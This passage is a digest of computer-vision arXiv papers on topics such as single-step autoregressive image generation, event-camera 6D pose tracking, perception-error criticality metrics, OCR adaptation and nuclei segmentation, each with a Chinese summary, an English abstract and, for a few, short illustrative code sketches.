Abstract:Based on the Distributed Convolutional Neural Network (DisCNN), a straightforward object detection method is proposed. The modules of the output vector of a DisCNN with respect to a specific positive class are positively monotonic with the presence probabilities of the positive features. Thus, by identifying all high-scoring patches across all possible scales and overlapping them to form a bounding box, the positive object can be detected. The essential idea is that the object is detected by detecting its features on multiple scales, ranging from specific sub-features to abstract features composed of these sub-features. Training DisCNN requires only object-centered image data with positive and negative class labels. The detection process for multiple positive classes can be conducted in parallel to significantly accelerate it, and single-object detection is also fast thanks to the lightweight model architecture.
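摘要中「多尺度高分 patch 叠合成包围盒」的检测思路可示意如下(分类器打分用给定的得分图代替,patch 大小、步长与阈值均为示例假设):

```python
import numpy as np

def detect_by_patches(score_map, patch, stride, thresh):
    """score_map: 每个 patch 左上角位置的正类得分(H x W 网格)。
    返回所有高分 patch 的并集包围盒 (y0, x0, y1, x1);无高分 patch 时返回 None。"""
    ys, xs = np.where(score_map >= thresh)
    if len(ys) == 0:
        return None
    y0, x0 = ys.min() * stride, xs.min() * stride
    y1, x1 = ys.max() * stride + patch, xs.max() * stride + patch
    return y0, x0, y1, x1

scores = np.zeros((6, 6))
scores[2:4, 1:3] = 0.9           # 假设目标附近的 patch 得分高
box = detect_by_patches(scores, patch=8, stride=4, thresh=0.5)
```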
[CV-84] Drift-AR: Single-Step Visual Autoregressive Generation via Anti-Symmetric Drifting
【速读】:该论文旨在解决自回归-扩散(AR-Diffusion)混合范式中存在的双重速度瓶颈问题:一是自回归(AR)阶段的序列生成效率低下,二是扩散视觉解码阶段需多次迭代去噪导致计算开销大。现有方法分别优化两个阶段,缺乏统一的设计原则。其解决方案的关键在于发现并利用连续空间AR模型中每位置的预测熵(prediction entropy)作为统一信号——该熵不仅反映AR阶段的生成不确定性,还与视觉解码阶段所需的修正强度相关。基于此,作者提出Drift-AR框架:1)在AR阶段引入熵感知的投机解码(Entropy-Informed Speculative Decoding),通过因果归一化熵损失对齐草稿与目标熵分布,减少无效草稿拒绝;2)在视觉解码阶段将熵重新解释为反向漂移场的初始状态方差,高熵区域驱动更强的漂移以逼近数据流形,低熵区域漂移趋近于零,从而实现单步(1-NFE)解码,无需迭代去噪或蒸馏。两个阶段共享同一熵信号,计算成本无额外增加,实验表明该方案在MAR、TransDiff和NextStep-1上实现3.8–5.5倍加速,且保持原始质量水平。
链接: https://arxiv.org/abs/2603.28049
作者: Zhen Zou,Xiaoxiao Ma,Mingde Yao,Jie Huang,LinJiang Huang,Feng Zhao
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Autoregressive (AR)-Diffusion hybrid paradigms combine AR’s structured semantic modeling with diffusion’s high-fidelity synthesis, yet suffer from a dual speed bottleneck: the sequential AR stage and the iterative multi-step denoising of the diffusion vision decode stage. Existing methods address each in isolation without a unified principle design. We observe that the per-position prediction entropy of continuous-space AR models naturally encodes spatially varying generation uncertainty, which simultaneously governs draft prediction quality in the AR stage and reflects the corrective effort required by the vision decoding stage, and which has not been fully explored before. Since entropy is inherently tied to both bottlenecks, it serves as a natural unifying signal for joint acceleration. In this work, we propose Drift-AR, which leverages the entropy signal to accelerate both stages: 1) for AR acceleration, we introduce Entropy-Informed Speculative Decoding that aligns draft–target entropy distributions via a causal-normalized entropy loss, resolving the entropy mismatch that causes excessive draft rejection; 2) for visual decoder acceleration, we reinterpret entropy as the physical variance of the initial state for an anti-symmetric drifting field – high-entropy positions activate stronger drift toward the data manifold while low-entropy positions yield vanishing drift – enabling single-step (1-NFE) decoding without iterative denoising or distillation. Moreover, both stages share the same entropy signal, which is computed once with no extra cost. Experiments on MAR, TransDiff, and NextStep-1 demonstrate 3.8–5.5× speedup with genuine 1-NFE decoding, matching or surpassing original quality. Code will be available at this https URL.
[CV-85] Event6D: Event-based Novel Object 6D Pose Tracking CVPR2026
【速读】:该论文旨在解决在高速动态场景中,传统RGB和深度图像流水线因运动模糊和大像素位移而导致6D目标位姿跟踪性能下降的问题。其核心解决方案是提出EventTrack6D框架,该框架利用事件相机(event camera)的微秒级延迟特性,通过条件于最新深度测量的双重建机制,从稀疏事件流中恢复密集的光度和几何线索,从而实现对新物体无需特定训练即可进行高帧率(>120 FPS)且时序一致的6D位姿跟踪。关键创新在于无需对象特定训练即可泛化到新物体,并在合成数据上训练后直接应用于真实场景而无需微调。
链接: https://arxiv.org/abs/2603.28045
作者: Jae-Young Kang,Hoonehee Cho,Taeyeop Lee,Minjun Kang,Bowen Wen,Youngho Kim,Kuk-Jin Yoon
机构: KAIST (韩国科学技术院); NVIDIA (英伟达)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Accepted by CVPR2026
Abstract:Event cameras provide microsecond latency, making them suitable for 6D object pose tracking in fast, dynamic scenes where conventional RGB and depth pipelines suffer from motion blur and large pixel displacements. We introduce EventTrack6D, an event-depth tracking framework that generalizes to novel objects without object-specific training by reconstructing both intensity and depth at arbitrary timestamps between depth frames. Conditioned on the most recent depth measurement, our dual reconstruction recovers dense photometric and geometric cues from sparse event streams. Our EventTrack6D operates at over 120 FPS and maintains temporal consistency under rapid motion. To support training and evaluation, we introduce a comprehensive benchmark suite: a large-scale synthetic dataset for training and two complementary evaluation sets, including real and simulated event datasets. Trained exclusively on synthetic data, EventTrack6D generalizes effectively to real-world scenarios without fine-tuning, maintaining accurate tracking across diverse objects and motion patterns. Our method and datasets validate the effectiveness of event cameras for event-based 6D pose tracking of novel objects. Code and datasets are publicly available at this https URL.
[CV-86] Effort-Based Criticality Metrics for Evaluating 3D Perception Errors in Autonomous Driving
【速读】:该论文旨在解决现有碰撞紧迫性度量(如时间到碰撞,Time-to-Collision, TTC)无法区分误报(False Positive, FP)与漏报(False Negative, FN)感知错误后果的问题,从而导致对自动驾驶系统中感知误差的安全影响评估不准确。解决方案的关键在于提出两项新的基于努力(effort-based)的度量指标,并改造一项已有指标:False Speed Reduction (FSR) 衡量因持续伪检测造成的累积速度损失;Maximum Deceleration Rate (MDR) 表征因遗漏物体在恒定加速度模型下产生的最大制动需求;Lateral Evasion Acceleration (LEA) 则在已有横向避让动力学的基础上结合可达性分析,量化避免预测碰撞所需的最小转向努力。此外,通过基于可达性的椭球形碰撞过滤器确保仅动态可行威胁被评分,并实现帧级匹配与轨迹级聚合,从而更精准地识别关键感知失败,实验表明65–93%的感知错误为非关键性,且所提指标能捕捉传统时间或减速度相关度量无法获取的安全相关信息。
链接: https://arxiv.org/abs/2603.28029
作者: Sharang Kaul,Simon Bultmann,Mario Berk,Abhinav Valada
机构: CARIAD SE (CARIAD SE); University of Freiburg (弗莱堡大学)
类目: Computer Vision and Pattern Recognition (cs.CV); Robotics (cs.RO)
备注:
Abstract:Criticality metrics such as time-to-collision (TTC) quantify collision urgency but conflate the consequences of false-positive (FP) and false-negative (FN) perception errors. We propose two novel effort-based metrics: False Speed Reduction (FSR), the cumulative velocity loss from persistent phantom detections, and Maximum Deceleration Rate (MDR), the peak braking demand from missed objects under a constant-acceleration model. These longitudinal metrics are complemented by Lateral Evasion Acceleration (LEA), adapted from prior lateral evasion kinematics and coupled with reachability-based collision timing to quantify the minimum steering effort to avoid a predicted collision. A reachability-based ellipsoidal collision filter ensures only dynamically plausible threats are scored, with frame-level matching and track-level aggregation. Evaluation of different perception pipelines on nuScenes and Argoverse 2 shows that 65-93% of errors are non-critical, and Spearman correlation analysis confirms that all three metrics capture safety-relevant information inaccessible to established time-based, deceleration-based, or normalized criticality measures, enabling targeted mining of the most critical perception failures.
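其中 MDR 的物理含义很直接:在恒定减速度假设下,要在剩余距离 d 内把相对接近速度 v 降为零,所需减速度为 a = v²/(2d)。下面按这一假设给出示意实现,并附 TTC 作对照(非论文官方代码):

```python
def mdr(rel_speed, distance):
    """恒定减速度模型:在 distance (m) 内消除 rel_speed (m/s) 所需的最小减速度 (m/s^2)。"""
    if rel_speed <= 0:
        return 0.0                     # 正在远离或静止,无需制动
    return rel_speed ** 2 / (2.0 * distance)

def ttc(rel_speed, distance):
    """时间到碰撞,仅在接近(rel_speed > 0)时有限。"""
    return float("inf") if rel_speed <= 0 else distance / rel_speed

a = mdr(10.0, 25.0)   # 10 m/s 相对速度、25 m 距离 -> 2.0 m/s^2
t = ttc(10.0, 25.0)   # -> 2.5 s
```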
[CV-87] Efficient Domain Adaptation for Text Line Recognition via Decoupled Language Models
【速读】:该论文旨在解决光学字符识别(Optical Character Recognition, OCR)系统在实际应用中因计算资源需求过高而导致的可及性问题,尤其是针对缺乏大规模标注数据和高性能计算能力的研究人员与数字人文学者。其核心挑战在于现有端到端Transformer架构虽能实现接近最先进(State-of-the-Art, SOTA)的准确率,但需数百GPU小时进行领域适应,难以普及。解决方案的关键在于提出一种模块化检测-校正框架:将轻量级视觉字符检测(与领域无关)与基于预训练序列模型(如T5、ByT5、BART)的语言校正分离,并通过合成噪声数据训练校正器,从而实现无需目标图像标注的无监督领域自适应。该设计显著降低计算成本约95%,同时保持接近端到端方法的性能,验证了分阶段处理在OCR中的有效性与高效性。
链接: https://arxiv.org/abs/2603.28028
作者: Arundhathi Dev,Justin Zhan
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV); Machine Learning (cs.LG)
备注: Accepted to the International Conference on Machine Intelligence Theory and Applications (MiTA 2026)
Abstract:Optical character recognition remains critical infrastructure for document digitization, yet state-of-the-art performance is often restricted to well-resourced institutions by prohibitive computational barriers. End-to-end transformer architectures achieve strong accuracy but demand hundreds of GPU hours for domain adaptation, limiting accessibility for practitioners and digital humanities scholars. We present a modular detection-and-correction framework that achieves near-SOTA accuracy with single-GPU training. Our approach decouples lightweight visual character detection (domain-agnostic) from domain-specific linguistic correction using pretrained sequence models including T5, ByT5, and BART. By training the correctors entirely on synthetic noise, we enable annotation-free domain adaptation without requiring labeled target images. Evaluating across modern clean handwriting, cursive script, and historical documents, we identify a critical “Pareto frontier” in architecture selection: T5-Base excels on modern text with standard vocabulary, whereas ByT5-Base dominates on historical documents by reconstructing archaic spellings at the byte level. Our results demonstrate that this decoupled paradigm matches end-to-end transformer accuracy while reducing compute by approximately 95%, establishing a viable, resource-efficient alternative to monolithic OCR architectures.
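「在合成噪声上训练校正器」意味着对干净文本注入 OCR 常见的形近替换与漏识删除,构造 (噪声, 干净) 训练对。以下是一个假设性的极简噪声生成器(混淆表与概率仅为示例,并非论文所用的噪声模型):

```python
import random

CONFUSIONS = {"l": "1", "O": "0", "S": "5"}   # 示例形近字符混淆表(假设)

def add_ocr_noise(text, sub_p=0.1, del_p=0.05, seed=0):
    """对干净文本注入字符级替换与删除,返回 (噪声文本, 干净文本) 训练对。"""
    rng = random.Random(seed)
    out = []
    for ch in text:
        if rng.random() < del_p:
            continue                       # 模拟漏识别(字符丢失)
        if ch in CONFUSIONS and rng.random() < sub_p:
            out.append(CONFUSIONS[ch])     # 模拟形近字符混淆
        else:
            out.append(ch)
    return "".join(out), text

noisy, clean = add_ocr_noise("Hello OCR world", sub_p=1.0, del_p=0.0)
```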
[CV-88] Adapting SAM to Nuclei Instance Segmentation and Classification via Cooperative Fine-Grained Refinement
【速读】:该论文旨在解决将通用图像分割模型Segment Anything Model (SAM)直接应用于医学图像中细胞核实例分割时面临的两大问题:一是SAM缺乏对局部结构特征的充分感知能力,这在细胞核分割任务中至关重要;二是全参数微调SAM所需计算成本过高,难以高效迁移其强大的先验知识。解决方案的关键在于提出一种参数高效的微调框架——协同细粒度精化SAM(Cooperative Fine-Grained Refinement of SAM),其核心创新包括三个模块:1)多尺度自适应局部感知适配器(Multi-scale Adaptive Local-aware Adapter),通过动态生成多尺度卷积核,在冻结SAM主干网络基础上以极少参数增强局部结构感知能力;2)分层调制融合模块(Hierarchical Modulated Fusion Module),动态聚合多层编码器特征以保留精细空间细节;3)边界引导掩码精化模块(Boundary-Guided Mask Refinement),利用多上下文边界线索与语义特征显式监督融合,生成边界聚焦信号以优化初始掩码预测,实现更清晰的轮廓分割。这三个组件协同作用,显著提升了SAM在细胞核实例分割任务中的局部感知精度、空间细节保持能力和边界清晰度。
链接: https://arxiv.org/abs/2603.28027
作者: Jingze Su,Tianle Zhu,Jiaxin Cai,Zhiyi Wang,Qi Li,Xiao Zhang,Tong Tong,Shu Wang,Wenxi Liu
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: 18 pages, 10 figures, 12 tables
Abstract:Nuclei instance segmentation is critical in computational pathology for cancer diagnosis and prognosis. Recently, the Segment Anything Model has demonstrated exceptional performance in various segmentation tasks, leveraging its rich priors and powerful global context modeling capabilities derived from large-scale pre-training on natural images. However, directly applying SAM to the medical imaging domain faces significant limitations: it lacks sufficient perception of the local structural features that are crucial for nuclei segmentation, and full fine-tuning for downstream tasks requires substantial computational costs. To efficiently transfer SAM’s robust prior knowledge to nuclei instance segmentation while supplementing its task-aware local perception, we propose a parameter-efficient fine-tuning framework, named Cooperative Fine-Grained Refinement of SAM, consisting of three core components: 1) a Multi-scale Adaptive Local-aware Adapter, which enables effective capability transfer by augmenting the frozen SAM backbone with minimal parameters and instilling a powerful perception of local structures through dynamically generated, multi-scale convolutional kernels; 2) a Hierarchical Modulated Fusion Module, which dynamically aggregates multi-level encoder features to preserve fine-grained spatial details; and 3) a Boundary-Guided Mask Refinement, which integrates multi-context boundary cues with semantic features through explicit supervision, producing a boundary-focused signal to refine initial mask predictions for sharper delineation. These three components work cooperatively to enhance local perception, preserve spatial details, and refine boundaries, enabling SAM to perform accurate nuclei instance segmentation directly.
[CV-89] SegRGB-X: General RGB-X Semantic Segmentation Model
【速读】:该论文旨在解决跨任意传感器模态(如事件、热成像、深度、偏振和光场等)的语义分割任务中因传感器特性差异导致的挑战,以及传统方法在不同模态下需重复开发所带来的冗余工作。其核心解决方案是提出一个通用的任意模态语义分割框架,关键创新包括:(1) 模态感知的CLIP(Modality-aware CLIP, MA-CLIP),通过LoRA微调提供模态特定的场景理解引导;(2) 模态对齐嵌入(Modality-aligned Embeddings),用于捕捉细粒度特征;(3) 领域特定细化模块(Domain-specific Refinement Module, DSRM),实现动态特征调整。该框架在五个不同模态的数据集上取得65.03%的平均交并比(mIoU),超越了现有的专用多模态方法。
链接: https://arxiv.org/abs/2603.28023
作者: Jiong Liu,Yingjie Xu,Xingcheng Zhou,Rui Song,Walter Zimmer,Alois Knoll,Hu Cao
机构: Technical University of Munich (慕尼黑工业大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Submitted to IEEE TITS
Abstract:Semantic segmentation across arbitrary sensor modalities faces significant challenges due to diverse sensor characteristics, and the traditional configurations for this task result in redundant development efforts. We address these challenges by introducing a universal arbitrary-modal semantic segmentation framework that unifies segmentation across multiple modalities. Our approach features three key innovations: (1) the Modality-aware CLIP (MA-CLIP), which provides modality-specific scene understanding guidance through LoRA fine-tuning; (2) Modality-aligned Embeddings for capturing fine-grained features; and (3) the Domain-specific Refinement Module (DSRM) for dynamic feature adjustment. Evaluated on five diverse datasets with different complementary modalities (event, thermal, depth, polarization, and light field), our model surpasses specialized multi-modal methods and achieves state-of-the-art performance with a mIoU of 65.03%. The codes will be released upon acceptance.
[CV-90] Physically Inspired Gaussian Splatting for HDR Novel View Synthesis CVPR2026
【速读】:该论文旨在解决高动态范围新视角合成(HDR-NVS)中难以准确建模环境光照依赖外观变化的问题,尤其是在低曝光或高曝光区域因梯度不足导致的重建质量下降问题。其核心解决方案是提出PhysHDR-GS框架,通过引入互补的图像-曝光(IE)分支与高斯-光照(GI)分支,分别负责忠实还原标准相机观测和捕捉光照依赖的外观变化;同时设计了跨分支HDR一致性损失以提供显式HDR监督,并采用光照引导的梯度缩放策略缓解曝光偏差引起的梯度稀释问题,从而实现高质量、实时的HDR细节重建。
链接: https://arxiv.org/abs/2603.28020
作者: Huimin Zeng,Yue Bai,Hailing Wang,Yun Fu
机构: Northeastern University (东北大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Accepted to CVPR 2026
Abstract:High dynamic range novel view synthesis (HDR-NVS) reconstructs scenes with dynamic details by fusing multi-exposure low dynamic range (LDR) views, yet it struggles to capture ambient illumination-dependent appearance. Implicitly supervising HDR content by constraining tone-mapped results fails in correcting abnormal HDR values, and results in limited gradients for Gaussians in under/over-exposed regions. To this end, we introduce PhysHDR-GS, a physically inspired HDR-NVS framework that models scene appearance via intrinsic reflectance and adjustable ambient illumination. PhysHDR-GS employs a complementary image-exposure (IE) branch and Gaussian-illumination (GI) branch to faithfully reproduce standard camera observations and capture illumination-dependent appearance changes, respectively. During training, the proposed cross-branch HDR consistency loss provides explicit supervision for HDR content, while an illumination-guided gradient scaling strategy mitigates exposure-biased gradient starvation and reduces under-densified representations. Experimental results across realistic and synthetic datasets demonstrate our superiority in reconstructing HDR details (e.g., a PSNR gain of 2.04 dB over HDR-GS), while maintaining real-time rendering speed (up to 76 FPS). Code and models are available at this https URL.
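The cross-branch HDR consistency loss couples the HDR predictions of the IE and GI branches. The abstract does not give its exact form, so the following is only a minimal stand-in (a plain per-pixel MSE between the two branches' HDR outputs) illustrating how such a term supplies explicit HDR supervision:

```python
def hdr_consistency_loss(hdr_a, hdr_b):
    """Mean squared error between the HDR predictions of two branches
    (a simplified stand-in for the paper's cross-branch consistency loss)."""
    n = len(hdr_a)
    return sum((a - b) ** 2 for a, b in zip(hdr_a, hdr_b)) / n

# Zero when the branches agree; grows with cross-branch disagreement
print(hdr_consistency_loss([1.0, 2.0, 4.0], [1.0, 2.0, 4.0]))  # 0.0
print(hdr_consistency_loss([1.0, 2.0, 4.0], [1.0, 2.0, 5.0]))
```

In training, minimizing such a term pushes both branches toward a shared HDR estimate instead of supervising HDR content only implicitly through tone-mapped results.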
[CV-91] Energy-Aware Imitation Learning for Steering Prediction Using Events and Frames
【速读】:该论文旨在解决自动驾驶中仅依赖帧-based相机导致的精度不足问题,尤其在长曝光时间、高速运动和复杂光照条件下表现不佳。其解决方案的关键在于引入一种类生物视觉传感器——事件相机(event camera),该传感器能够捕捉稀疏且异步的事件数据,与传统图像帧形成互补模态。论文提出了一种能量感知的模仿学习框架,通过设计能量驱动的跨模态融合模块(Energy-driven Cross-modality Fusion Module, ECFM)和能量感知解码器,实现对转向指令的可靠且安全预测,从而提升系统在复杂场景下的鲁棒性与性能。
链接: https://arxiv.org/abs/2603.28008
作者: Hu Cao,Jiong Liu,Xingzhuo Yan,Rui Song,Yan Xia,Walter Zimmer,Guang Chen,Alois Knoll
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Submitted to the journal
Abstract:In autonomous driving, relying solely on frame-based cameras can lead to inaccuracies caused by factors like long exposure times, high-speed motion, and challenging lighting conditions. To address these issues, we introduce a bio-inspired vision sensor known as the event camera. Unlike conventional cameras, event cameras capture sparse, asynchronous events that provide a complementary modality to mitigate these challenges. In this work, we propose an energy-aware imitation learning framework for steering prediction that leverages both events and frames. Specifically, we design an Energy-driven Cross-modality Fusion Module (ECFM) and an energy-aware decoder to produce reliable and safe predictions. Extensive experiments on two public real-world datasets, DDD20 and DRFuser, demonstrate that our method outperforms existing state-of-the-art (SOTA) approaches. The codes and trained models will be released upon acceptance.
[CV-92] DipGuava: Disentangling Personalized Gaussian Features for 3D Head Avatars from Monocular Video AAAI2026
【速读】:该论文旨在解决现有3D头像生成方法在动画面部动态时难以捕捉个性化细节的问题,从而限制了头像的真实感和表现力。其解决方案的关键在于提出了一种名为DipGuava(Disentangled and Personalized Gaussian UV Avatar)的新方法,首次显式地将面部外观解耦为两个互补组件:第一阶段学习基于几何驱动的稳定基础外观,以捕捉全局面部结构及粗粒度的表情变化;第二阶段预测第一阶段未包含的个性化残差细节,如高频纹理和非线性变化特征(如皱纹与细微皮肤形变)。通过动态外观融合机制,在变形后整合残差细节,确保空间与语义对齐,从而实现高保真、身份一致的逼真头像重建。
链接: https://arxiv.org/abs/2603.28003
作者: Jeonghaeng Lee,Seok Keun Choi,Zhixuan Li,Weisi Lin,Sanghoon Lee
机构: 1. Korea University(韩国大学); 2. Nanyang Technological University(南洋理工大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: AAAI 2026
Abstract:While recent 3D head avatar creation methods attempt to animate facial dynamics, they often fail to capture personalized details, limiting realism and expressiveness. To fill this gap, we present DipGuava (Disentangled and Personalized Gaussian UV Avatar), a novel 3D Gaussian head avatar creation method that successfully generates avatars with personalized attributes from monocular video. DipGuava is the first method to explicitly disentangle facial appearance into two complementary components, trained in a structured two-stage pipeline that significantly reduces learning ambiguity and enhances reconstruction fidelity. In the first stage, we learn a stable geometry-driven base appearance that captures global facial structure and coarse expression-dependent variations. In the second stage, the personalized residual details not captured in the first stage are predicted, including high-frequency components and nonlinearly varying features such as wrinkles and subtle skin deformations. These components are fused via dynamic appearance fusion that integrates residual details after deformation, ensuring spatial and semantic alignment. This disentangled design enables DipGuava to generate photorealistic, identity-preserving avatars, consistently outperforming prior methods in both visual quality and quantitative performance, as demonstrated in extensive experiments.
[CV-93] CLIP-AUTT: Test-Time Personalization with Action Unit Prompting for Fine-Grained Video Emotion Recognition
【速读】:该论文旨在解决情感识别(Emotion Recognition, ER)中因个体差异导致的细微表情难以准确建模的问题,尤其是在视频场景下,现有基于视觉-语言模型(Vision-Language Models, VLMs)如CLIP的方法受限于依赖对比预训练或大语言模型(LLM)生成文本提示所带来的噪声、计算开销高及细粒度表达捕捉能力弱等缺陷。其解决方案的关键在于引入动作单元(Action Units, AUs)作为结构化文本提示嵌入CLIP框架,通过AU引导的时序学习机制(CLIP-AU)实现无需微调CLIP且不依赖LLM监督的细粒度表情建模;进一步提出CLIP-AUTT方法,在测试阶段动态适应未见受试者的视频序列,结合熵引导的时间窗口选择与提示调优策略,实现对个体细微表情差异的个性化适配,同时保持时序一致性。
链接: https://arxiv.org/abs/2603.27999
作者: Muhammad Osama Zeeshan,Masoumeh Sharafi,Benoît Savary,Alessandro Lameiras Koerich,Marco Pedersoli,Eric Granger
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Personalization in emotion recognition (ER) is essential for an accurate interpretation of subtle and subject-specific expressive patterns. Recent advances in vision-language models (VLMs) such as CLIP demonstrate strong potential for leveraging joint image-text representations in ER. However, CLIP-based methods either depend on CLIP’s contrastive pretraining or on LLMs to generate descriptive text prompts, which are noisy, computationally expensive, and fail to capture fine-grained expressions, leading to degraded performance. In this work, we leverage Action Units (AUs) as structured textual prompts within CLIP to model fine-grained facial expressions. AUs encode the subtle muscle activations underlying expressions, providing localized and interpretable semantic cues for more robust ER. We introduce CLIP-AU, a lightweight AU-guided temporal learning method that integrates interpretable AU semantics into CLIP. It learns generic, subject-agnostic representations by aligning AU prompts with facial dynamics, enabling fine-grained ER without CLIP fine-tuning or LLM-generated text supervision. Although CLIP-AU models fine-grained AU semantics, it does not adapt to subject-specific variability in subtle expressions. To address this limitation, we propose CLIP-AUTT, a video-based test-time personalization method that dynamically adapts AU prompts to videos from unseen subjects. By combining entropy-guided temporal window selection with prompt tuning, CLIP-AUTT enables subject-specific adaptation while preserving temporal consistency. Our extensive experiments on three challenging video-based subtle ER datasets, BioVid, StressID, and BAH, indicate that CLIP-AU and CLIP-AUTT outperform state-of-the-art CLIP-based FER and TTA methods, achieving robust and personalized subtle ER.
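CLIP-AUTT's entropy-guided temporal window selection picks video segments where the model is confident before tuning prompts on them. A toy sketch of that selection criterion (the windowing rule and confidence measure here are assumptions, not the paper's exact procedure): compute the prediction entropy per frame and keep the window with the lowest mean entropy.

```python
import math

def entropy(p):
    """Shannon entropy of a probability vector (low = confident prediction)."""
    return -sum(x * math.log(x) for x in p if x > 0)

def select_window(frame_probs, window=2):
    """Return the start index of the temporal window with lowest mean entropy."""
    best_start, best_score = 0, float("inf")
    for s in range(len(frame_probs) - window + 1):
        score = sum(entropy(p) for p in frame_probs[s:s + window]) / window
        if score < best_score:
            best_start, best_score = s, score
    return best_start

# Per-frame class probabilities for a 4-frame clip; frames 1-2 are the most confident
probs = [[0.5, 0.5], [0.9, 0.1], [0.95, 0.05], [0.6, 0.4]]
start = select_window(probs, window=2)
print(start)  # 1
```

Prompt tuning would then update the AU prompts only on the selected confident window, which is what allows subject-specific adaptation at test time without labels.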
[CV-94] UniDA3D: A Unified Domain-Adaptive Framework for Multi-View 3D Object Detection
【速读】:该论文旨在解决相机-only多视角3D目标检测在复杂环境条件下(如夜间、雨天和雾天)性能显著下降的问题,其根源在于现有方法主要依赖理想光照与天气条件下的训练数据。解决方案的关键在于提出UniDA3D,一个统一的域自适应多视角3D检测框架,将不同恶劣场景建模为统一的多目标域自适应问题,并引入查询引导的域差异缓解(Query Guided Domain Discrepancy Mitigation, QDDM)模块,通过查询中心的对抗学习与对比学习,在批次级和全局级实现源域与目标域间物体特征对齐;同时设计了一种域自适应教师-学生训练流程,结合指数移动平均教师模型与动态更新的高质量伪标签,增强一致性学习并抑制未标注目标域中的背景噪声,从而实现单一统一训练过程下跨多种恶劣环境的鲁棒感知能力。
链接: https://arxiv.org/abs/2603.27995
作者: Hongjing Wu,Cheng Chi,Jinlin Wu,Yanzhao Su,Zhen Lei,Wenqi Ren
机构: Sun Yat-sen University (中山大学); Zhejiang University (浙江大学); Beijing Academy of Artificial Intelligence (北京人工智能研究院); National Laboratory of Pattern Recognition, Institute of Automation, Chinese Academy of Sciences (中国科学院自动化研究所模式识别国家重点实验室); Xi’an Research Institute of High-tech (西安高技术研究院)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Camera-only 3D object detection is critical for autonomous driving, offering a cost-effective alternative to LiDAR-based methods. In particular, multi-view 3D object detection has emerged as a promising direction due to its balanced trade-off between performance and cost. However, existing methods often suffer significant performance degradation under complex environmental conditions such as nighttime, fog, and rain, primarily due to their reliance on training data collected mostly in ideal conditions. To address this challenge, we propose UniDA3D, a unified domain-adaptive multi-view 3D object detector designed for robust perception under diverse adverse conditions. UniDA3D formulates nighttime, rainy, and foggy scenes as a unified multi-target domain adaptation problem and leverages a novel query-guided domain discrepancy mitigation (QDDM) module to align object features between source and target domains at both batch and global levels via query-centric adversarial and contrastive learning. Furthermore, we introduce a domain-adaptive teacher-student training pipeline with an exponential-moving-average teacher and dynamically updated high-quality pseudo labels to enhance consistency learning and suppress background noise in unlabeled target domains. In contrast to prior approaches that require separate training for each condition, UniDA3D performs a single unified training process across multiple domains, enabling robust all-weather 3D perception. On a synthesized multi-view 3D benchmark constructed by generating nighttime, rainy, and foggy counterparts from nuScenes (nuScenes-Night, nuScenes-Rain, and nuScenes-Haze), UniDA3D consistently outperforms state-of-the-art camera-only multi-view 3D detectors under extreme conditions, achieving substantial gains in mAP and NDS while maintaining real-time inference efficiency.
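The exponential-moving-average (EMA) teacher named in the abstract is a standard component of consistency training: after each student step, the teacher's weights are blended toward the student's. A minimal sketch of that update rule (parameter names and the momentum value are illustrative, not taken from the paper):

```python
def ema_update(teacher_params, student_params, momentum=0.999):
    """One EMA step: theta_teacher <- m * theta_teacher + (1 - m) * theta_student."""
    return {name: momentum * t + (1.0 - momentum) * student_params[name]
            for name, t in teacher_params.items()}

# Toy one-parameter "models": the teacher decays smoothly toward the student
teacher = {"w": 1.0}
student = {"w": 0.0}
for _ in range(3):
    teacher = ema_update(teacher, student, momentum=0.9)
print(teacher["w"])  # ≈ 0.9**3 = 0.729
```

Because the teacher averages over many student checkpoints, its pseudo labels are more stable than the student's instantaneous predictions, which is why EMA teachers are commonly used to generate supervision on unlabeled target domains.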
[CV-95] Progressive Prompt-Guided Cross-Modal Reasoning for Referring Image Segmentation
【速读】:该论文旨在解决参考图像分割(referring image segmentation)中如何有效将自然语言描述与图像中的目标对象视觉表征进行对齐的问题,尤其针对包含详细属性和复杂对象间关系的指代表达。现有方法多依赖跨模态对齐或语义分割提示(Semantic Segmentation Prompt),但缺乏显式的推理机制来实现语言到图像区域的精准定位。解决方案的关键在于提出一种渐进式提示引导的跨模态推理框架(Progressive Prompt-guided Cross-modal Reasoning, PPCR),其核心结构为“语义理解—空间定位—实例分割”的三阶段流程:首先利用多模态大语言模型(Multimodal Large Language Models, MLLMs)生成捕捉目标关键语义线索的语义分割提示;随后基于该语义上下文进一步生成空间分割提示以推理目标位置与空间范围,实现从语义理解到空间定位的渐进过渡;最终将两类提示联合注入分割模块,显著提升目标定位与分割精度。
链接: https://arxiv.org/abs/2603.27993
作者: Jiachen Li,Hongyun Wang,Jinyu Xu,Wenbo Jiang,Yanchun Ma,Yongjian Liu,Qing Xie,Bolong Zheng
机构: Wuhan University of Technology (武汉理工大学); Huazhong University of Science and Technology (华中科技大学); University of Electronic Science and Technology of China (电子科技大学); Wuhan Vocational College of Software and Engineering (武汉软件工程职业学院)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Referring image segmentation aims to localize and segment a target object in an image based on a free-form referring expression. The core challenge lies in effectively bridging linguistic descriptions with object-level visual representations, especially when referring expressions involve detailed attributes and complex inter-object relationships. Existing methods either rely on cross-modal alignment or employ Semantic Segmentation Prompts, but they often lack explicit reasoning mechanisms for grounding language descriptions to target regions in the image. To address these limitations, we propose PPCR, a Progressive Prompt-guided Cross-modal Reasoning framework for referring image segmentation. PPCR explicitly structures the reasoning process as a Semantic Understanding-Spatial Grounding-Instance Segmentation pipeline. Specifically, PPCR first employs multimodal large language models (MLLMs) to generate Semantic Segmentation Prompt that capture key semantic cues of the target object. Based on this semantic context, Spatial Segmentation Prompt are further generated to reason about object location and spatial extent, enabling a progressive transition from semantic understanding to spatial grounding. The Semantic and Spatial Segmentation prompts are then jointly integrated into the segmentation module to guide accurate target localization and segmentation. Extensive experiments on standard referring image segmentation benchmarks demonstrate that PPCR consistently outperforms existing methods. The code will be publicly released to facilitate reproducibility.
[CV-96] Beyond Dataset Distillation: Lossless Dataset Concentration via Diffusion-Assisted Distribution Alignment
